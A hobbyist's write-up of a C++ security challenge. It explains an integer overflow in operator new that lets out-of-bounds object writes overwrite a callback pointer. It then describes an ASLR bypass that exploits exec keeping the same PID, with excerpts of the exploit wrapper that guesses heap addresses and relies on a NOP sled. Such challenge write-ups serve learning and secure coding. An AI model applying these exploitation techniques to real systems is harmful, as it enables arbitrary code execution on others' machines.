
Important note

I am NOT a security researcher (I kinda want to be though). As such, there are probably way better ways to do everything in this article. This article is just illustrating my thought process when cracking this challenge.

The Challenge

The Matasano Security blog recently posted an article titled A C++ Challenge which included a particularly ugly piece of C++ code that has a security vulnerability. The challenge is for the reader to find the vulnerability, use it to execute arbitrary code, and submit the data to Matasano.

Sounds easy enough, let’s do this! (cue hacking music)

Making it harder

Recent Linux kernels have a feature called Address Space Layout Randomization (ASLR) which can be set in /proc/sys/kernel/randomize_va_space. ASLR is a security feature which randomizes the start address of various parts of a process image. Doing this makes exploiting a security bug more difficult because the exploit cannot use any hard-coded addresses.

The options you can set are:

0 – ASLR off

1 – Randomize the addresses of the stack, mmap area, and VDSO page. This is the default.

2 – Everything in option 1, but also randomize the brk area so the heap is randomized.

Just for fun I decided to set it to 2 to make exploiting the challenge more difficult.
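If you want to check which mode a machine is in before trying any of this, the setting can be read straight out of /proc. Here is a minimal sketch of that; it is not part of the challenge or my exploit, the helper names read_aslr_level and describe_aslr_level are made up for illustration, and the descriptions just restate the list above.

```cpp
#include <fstream>
#include <string>

// Hypothetical helper: map a randomize_va_space value to the options listed above.
const char* describe_aslr_level(int level) {
    switch (level) {
        case 0:  return "ASLR off";
        case 1:  return "stack, mmap area, and VDSO page randomized";
        case 2:  return "stack, mmap area, VDSO page, and brk area (heap) randomized";
        default: return "unknown setting";
    }
}

// Hypothetical helper: read the current setting.
// Returns -1 if the file cannot be opened or does not start with an integer.
int read_aslr_level(const std::string& path = "/proc/sys/kernel/randomize_va_space") {
    std::ifstream in(path);
    int level = -1;
    if (in >> level) {
        return level;
    }
    return -1;
}
```

Calling describe_aslr_level(read_aslr_level()) gives a one-line summary of the current mode on a Linux box; on other systems the file will not exist and the read returns -1.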

Got the code, but now what?

I decided to start attacking this problem by looking for a few common errors, in this order:

strcpy()/strncpy() bugs – No calls

memcpy() bugs – A few calls

Off-by-one bugs – None obvious

It turned out from a quick look that all calls to memcpy() included sane, hard-coded values. So, it had to be something more complex.

Digging deeper – finding input streams the user can control

Next, I decided to actually read the code and see what it was doing at a high level and what inputs could be controlled. Turns out that the program reads data from a file and uses the data from the file to determine how many objects to allocate.

Obviously, this portion of the code caught my interest so let’s take a quick look:

    /* ... */
    fd.read(file_in_mem, MAX_FILE_SIZE-1);
    /* ... */
    struct _stream_hdr *s = (struct _stream_hdr *) file_in_mem;

    if(s->num_of_streams >= INT_MAX / (int)sizeof(int)) {
        safe_count = MAX_STREAMS;
    } else {
        safe_count = s->num_of_streams;
    }

    Obj *o = new Obj[safe_count];

OK, so clearly that if statement is suspect. At the very least it doesn’t check for negative values, so you could end up with safe_count = -1 which might do something interesting when passed to the new operator. Moreover, it appears this if statement will allow values as large as 536870910 ([INT_MAX / sizeof(int)] – 1).

Maybe the exploit has something to do with values this if statement is allowing through?
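To convince myself about which values get through, the check can be pulled out into a tiny function and poked at. This is only a sketch: it assumes num_of_streams is a plain 32-bit int (the excerpt doesn't show its type), and kMaxStreams is a made-up stand-in because the real value of MAX_STREAMS isn't shown either.

```cpp
#include <climits>

// Hypothetical stand-in: the real MAX_STREAMS is not shown in the challenge excerpt.
constexpr int kMaxStreams = 64;

// Mirrors the bounds check from the challenge code (assumes num_of_streams is an int).
constexpr int choose_safe_count(int num_of_streams) {
    return (num_of_streams >= INT_MAX / static_cast<int>(sizeof(int)))
               ? kMaxStreams
               : num_of_streams;
}

// Largest count the check lets through unchanged: 536870910 with a 32-bit int.
constexpr int kLargestAccepted = INT_MAX / static_cast<int>(sizeof(int)) - 1;

static_assert(choose_safe_count(-1) == -1,
              "negative counts pass straight through");
static_assert(choose_safe_count(kLargestAccepted) == kLargestAccepted,
              "the largest accepted count is not clamped");
static_assert(choose_safe_count(kLargestAccepted + 1) == kMaxStreams,
              "one more than that is clamped to the maximum");
```

The static_asserts are checked at compile time, so if the file compiles, the claims above hold for that platform's int.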

A closer look at the integer overflow in new

Let’s use GDB to take a closer look at what the compiler does before calling new. I’ve added a few comments in line to explain the assembly code:

    mov  %edx,%eax     ; %edx and %eax store s->num_of_streams
    add  %eax,%eax     ; add %eax to itself (s->num_of_streams * 2)
    add  %edx,%eax     ; add s->num_of_streams + %eax (s->num_of_streams * 3)
    shl  $0x2,%eax     ; multiply (s->num_of_streams * 3) by 4 (s->num_of_streams * 12)
    mov  %eax,(%esp)   ; move it into position to pass to new
    call 0x8048a7c     ; call new

The compiler has generated code to calculate s->num_of_streams * sizeof(Obj), where sizeof(Obj) is 12 bytes. For large values of s->num_of_streams, multiplying by 12 causes an integer overflow, and the value passed to new will actually be less than what was intended.

For my exploit, I ended up using the value 357913943. This value causes an overflow because 357913943 * 12 = 4294967316, which exceeds 2^32 (4294967296) by 20. The 32-bit result wraps around, so the value passed to new is 20, which is, of course, significantly less than what we actually wanted to allocate. Other people have written about integer overflow in new in other compilers before.
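The wraparound is easy to reproduce without the challenge binary. The sketch below is my own illustration (the function names are made up): it does the same multiplication once in 32 bits, the way the generated code does, and once in 64 bits to show the size that was actually intended.

```cpp
#include <cstdint>

constexpr std::uint32_t kObjSize = 12;  // sizeof(Obj) as seen in the disassembly

// What the 32-bit code passes to new: the product modulo 2^32.
// Unsigned arithmetic is used here so the wraparound is well defined.
constexpr std::uint32_t wrapped_alloc_size(std::uint32_t count) {
    return count * kObjSize;
}

// What the programmer meant to allocate, computed in 64 bits so it cannot wrap.
constexpr std::uint64_t intended_alloc_size(std::uint32_t count) {
    return static_cast<std::uint64_t>(count) * kObjSize;
}

static_assert(intended_alloc_size(357913943u) == 4294967316ULL,
              "the intended size is just over 4 GiB");
static_assert(wrapped_alloc_size(357913943u) == 20u,
              "the 32-bit product wraps around to 20");
```

So a request for roughly 4 GiB of Obj objects turns into a 20 byte allocation, which is enough room for one Obj and not much else.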

Let’s see how this can be used to cause arbitrary code to execute. Remember, for arbitrary code execution to occur there must be a way to cause the target program to write some data to a memory address that can be controlled.

Find the (possible) hand-off(s) to arbitrary code

To find any hand-off locations, I looked for places where memory writes were occurring in the program. I found a few memory writes:

2 calls to memset()

2 calls to memcpy()

parse_stream() of class Obj

Unfortunately (from the attacker’s perspective) the calls to memcpy() and memset() looked pretty sane. The parse_stream() function caught my interest, though.

Take a look:

    class Obj {
    public:
        int parse_stream(int t, char *stream) {
            type = t;
            // ... do something with stream here ...
            return 0;
        }
        int length;
        int type;
        /* ... */

REMEMBER: In C++, member functions of classes have a sekrit parameter which is a pointer to the object the function is being called on. In the function itself, this parameter is accessed using this. So the line writing to the type variable is actually doing this->type = t; where this is supplied to the function sekritly by the compiler.

This is important because this piece of code could be our hand-off! We need to find a way to control the value of this so we can cause a memory write to a location of our choice.
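If the hidden parameter is hard to picture, here is a small sketch that spells it out. ObjSketch is a simplified stand-in for the challenge's Obj (the stream argument is dropped), and parse_stream_explicit is a made-up free function showing roughly what the member function looks like once the compiler has added the object pointer.

```cpp
// Simplified stand-in for the challenge's Obj class.
struct ObjSketch {
    int length = 0;
    int type = 0;

    // What the programmer writes: `this` is implicit.
    int parse_stream(int t) {
        type = t;  // really this->type = t;
        return 0;
    }
};

// Roughly what the compiler turns it into: the object pointer becomes
// an explicit first argument, and the write goes through that pointer.
int parse_stream_explicit(ObjSketch* self, int t) {
    self->type = t;
    return 0;
}
```

Both versions write t to whatever address the object pointer holds plus the offset of type, without checking that an ObjSketch actually lives there.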

Controlling this to cause arbitrary code to execute

Take a look at an important piece of code in the challenge:

    struct imetad {
        int msg_length;
        int (*callback)(int, struct imetad *);
        /* ... */

Nice! The callback field of struct imetad is offset by 4 bytes into the structure. The type field of class Obj is also offset by 4 bytes. See where I’m going?

If we can control the this pointer to point at the struct imetad on the heap when parse_stream is called, it will overwrite the callback pointer. We’ll then be able to set the pointer to any address we want and hand-off execution to arbitrary code!
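The offsets can be checked with offsetof rather than by counting bytes. In this sketch ObjLayout and imetad_layout are cut-down copies containing only the fields shown above, so treat them as assumptions about the real layout. Note that the two offsets only line up on a 32-bit target like the i386 system I used; on a typical x86-64 build the function pointer is 8-byte aligned and callback lands at offset 8 instead.

```cpp
#include <cstddef>

// Cut-down copies of the two types, holding only the fields shown above.
struct ObjLayout {
    int length;
    int type;
};

struct imetad_layout {
    int msg_length;
    int (*callback)(int, imetad_layout*);
};

constexpr std::size_t kTypeOffset = offsetof(ObjLayout, type);
constexpr std::size_t kCallbackOffset = offsetof(imetad_layout, callback);

// True on i386 (both offsets are 4); false on typical x86-64 (4 vs 8).
constexpr bool kFieldsOverlap = (kTypeOffset == kCallbackOffset);
```

When kFieldsOverlap is true, a write to type through a pointer that really points at an imetad lands exactly on callback.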

But how can we manipulate this?

Take a look at this piece of code that calls callback:

    o[i].parse_stream(dword, stream_temp);
    imd->callback(o[i].type, imd);

Since it is possible to overflow new and allocate fewer objects than safe_count is counting, for some values of i, o[i] will be pointing at data that isn’t actually an Obj object, but just other data on the heap. In fact, when i = 2, o[i] will be pointing at the struct imetad object on the heap. The call to parse_stream will pass in a corrupted this pointer that points at struct imetad. The write to type will actually overwrite callback since they are both offset equal amounts into their respective structures.
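Some quick index arithmetic shows how little of the array is actually backed by the 20 byte allocation. The sketch below only computes offsets and never touches memory; the helper names are made up. Whether o[2] really lands on the struct imetad depends on how the allocator lays out the heap, so that part is something I observed on my system, not something this code proves.

```cpp
#include <cstddef>

constexpr std::size_t kObjSize = 12;     // sizeof(Obj) as seen in the disassembly
constexpr std::size_t kAllocBytes = 20;  // what new was actually asked for

// Byte offset of o[i] from the start of the allocation.
constexpr std::size_t element_offset(std::size_t i) {
    return i * kObjSize;
}

// True only if o[i] lies entirely inside the allocated bytes.
constexpr bool element_fits(std::size_t i) {
    return element_offset(i) + kObjSize <= kAllocBytes;
}

static_assert(element_fits(0), "o[0] is the only complete element");
static_assert(!element_fits(1), "o[1] starts at byte 12 and runs past byte 20");
static_assert(element_offset(2) == 24, "o[2] starts beyond the allocation");
```

Everything from o[1] onward is an out-of-bounds access, and the loop happily keeps calling parse_stream on those addresses.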

And with that, we’ve successfully exploited the challenge causing arbitrary code to execute.

Let’s now figure out how to beat ASLR!

How to defeat address space layout randomization

I did NOT invent this technique, but I read about it and thought it was cool. You can read a more verbose explanation of this technique here. The idea behind the technique is pretty simple:

When you call exec, the PID remains the same, but the image of the process in memory is changed.

The kernel uses the PID and the number of jiffies (jiffies is a fine-grained time measurement in the kernel) to pull data from the entropy pool.

If you can run a program which records stack, heap, and other addresses and then quickly call exec to start the vulnerable program, you can end up with the same memory layout.
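The first point, that exec keeps the PID, is easy to verify on any POSIX system. The sketch below is my own illustration and not part of the exploit: it forks a child, has the child exec /bin/sh to print its own PID ($$), and compares that with the PID fork() reported. Using /bin/sh as the exec target is just an assumption to keep the example small; it stands in for the vulnerable program.

```cpp
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <cstdlib>

// Returns true if the PID printed by the exec'd shell equals the PID
// that fork() gave the child, i.e. exec did not change the PID.
bool pid_survives_exec() {
    int fds[2];
    if (pipe(fds) != 0) {
        return false;
    }

    pid_t child = fork();
    if (child < 0) {
        close(fds[0]);
        close(fds[1]);
        return false;
    }

    if (child == 0) {
        // Child: route stdout into the pipe, then replace the process image.
        close(fds[0]);
        dup2(fds[1], STDOUT_FILENO);
        close(fds[1]);
        execl("/bin/sh", "sh", "-c", "echo $$", (char*)nullptr);
        _exit(127);  // only reached if execl failed
    }

    // Parent: read the PID the shell printed and reap the child.
    close(fds[1]);
    char buf[32] = {0};
    ssize_t n = read(fds[0], buf, sizeof(buf) - 1);
    close(fds[0]);
    int status = 0;
    waitpid(child, &status, 0);

    if (n <= 0) {
        return false;
    }
    return std::strtol(buf, nullptr, 10) == static_cast<long>(child);
}
```

The exploit wrapper relies on exactly this property, except that it skips the fork and calls execl directly so the wrapper and the challenge binary share one PID.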

My exploit program is actually a wrapper which records an approximate location of the heap (by just calling malloc()), generates the exploit file, and then executes the challenge binary.

Take a look at the relevant pieces of my exploit to get an idea of how it works:

    /* ... */

    /* do a malloc to get an idea of where the heap lives */
    void *dummy = malloc(10);

    /* ... */

    unsigned int shell_addr = reinterpret_void_ptr_as_uint(dummy);

    /*
     * XXX TODO FIXME - on my platform, execl'ing from here to the challenge binary
     * incurs a constant offset of 0x3160, probably for changes in the environment
     * (libs linked for c++ and whatnot).
     */
    shell_addr += 0x3160;

    /*
     * a guess as to how far off the heap the shellcode lives.
     *
     * luckily we have a large NOP sled, so we should only fail when we miss
     * the current entropy cycle (see below).
     */
    shell_addr += 700;

    /* ... build exploit file in memory ... */

    /* copy in our best guess as to the address of the shellcode, pray NOPs
     * take care of the rest! */
    memcpy(entire_file+88, &shell_addr, sizeof(shell_addr));

    /* ... write exploit out to disk ... */

    /* launch program with the generated exploit file!
     *
     * calling execl here inherits the PID of this process, and IF we get lucky
     * ~85%+ of the time, we'll execute before the next entropy cycle and hit
     * the shellcode, even with ASLR=2.
     */
    execl("./cpp_challenge", "cpp_challenge", "exploit", (char *)0);
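Two ideas in that excerpt are worth isolating: patching the guessed address into the file image, and why a NOP sled makes an imprecise guess good enough. The sketch below is a simplified illustration with made-up helper names (patch_address, lands_in_sled), not the code from my exploit. The offset 88 comes from the excerpt above; the image size and sled bounds in any usage are assumptions.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical helper: write a 32-bit address into the file image at `offset`
// in native byte order. Returns false instead of writing out of bounds.
bool patch_address(std::vector<unsigned char>& image,
                   std::size_t offset,
                   std::uint32_t addr) {
    if (offset > image.size() || image.size() - offset < sizeof(addr)) {
        return false;
    }
    std::memcpy(image.data() + offset, &addr, sizeof(addr));
    return true;
}

// Hypothetical helper: a guess is good enough if it lands anywhere inside
// the NOP sled, because execution then slides forward into the shellcode.
constexpr bool lands_in_sled(std::uint32_t guess,
                             std::uint32_t sled_start,
                             std::uint32_t sled_len) {
    return guess >= sled_start && guess - sled_start < sled_len;
}
```

The longer the sled, the more slack there is in the two offsets added to shell_addr, which is why the only real failure mode left is missing the entropy window.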

My exploit for the C++ challenge

My exploit comes with the following caveats:

i386 system

The challenge binary is called “cpp_challenge” and lives in the same directory as the exploit binary.

The exploit binary can write to the directory and create a file called “exploit” which will be handed off to “cpp_challenge”

Get the full code of my exploit here.

Results

Results on my i386 Ubuntu 8.04 VM running in VMware Fusion, for each level of randomize_va_space:

0 – 100% exploit hit rate

1 – 100% exploit hit rate

2 – ~85% exploit hit rate. Sometimes, my exploit code falls out of the time window and the address map changes before the challenge binary is run.

I could probably boost the hit rate for 2 a bit, but to do that I’d probably have to rewrite the entire exploit in assembly to make it run as fast as possible. I didn’t think there was really a point in going to such an extreme, though. So, an 85% hit rate is good enough.

Conclusion

Security challenges are fun. More emphasis and more freely available information on secure coding would be very useful. Like it or not, developers need to be security conscious when writing code in C and C++. As C and C++ change, developers need to carefully consider the security implications of new features.


References